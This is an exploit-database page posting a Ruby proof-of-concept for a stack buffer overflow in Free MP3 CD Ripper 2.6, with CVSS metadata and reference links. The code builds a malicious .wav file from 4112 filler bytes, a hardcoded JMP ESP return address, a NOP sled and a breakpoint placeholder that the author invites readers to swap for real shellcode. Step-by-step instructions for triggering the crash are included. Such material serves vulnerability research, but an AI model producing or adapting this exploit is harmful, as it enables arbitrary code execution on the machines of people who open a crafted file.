Free MP3 CD Ripper 2.6 (wav) Ruby PoC

2012.09.17
Credit: Richard leahy
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Free MP3 CD Ripper 2.6 (wav) 0-day # Date: 30/03/2010 # Author: Richard leahy # Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html # Version: 2.6 # Tested on: Windows Xp Sp2 #to exploit this open up the application select file -> wav converter -> wav to mp3 #use your favourite programming language and print out the contents into a text file. save the text #file as a .wav #then open up the wav file and boom. #feel free to email me leahy_rich@hotmail.com #code !#/usr/bin/env ruby nop = "\x90" # nop shellcode = "\xCC" #just an interupt can be replaced by proper shellcode jmp_esp = "\x32\xfa\xca\x76" #find a jmp esp i will use imagehlp , little endian so reverse it boom = "A" * 4112 + jmp_esp + nop * 50 + shellcode puts boom

References:

http://www.securityfocus.com/bid/39672
http://www.osvdb.org/63349
http://www.exploit-db.com/exploits/18142
http://www.exploit-db.com/exploits/17727
http://www.exploit-db.com/exploits/11976
http://www.exploit-db.com/exploits/11975
http://secunia.com/advisories/39193


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top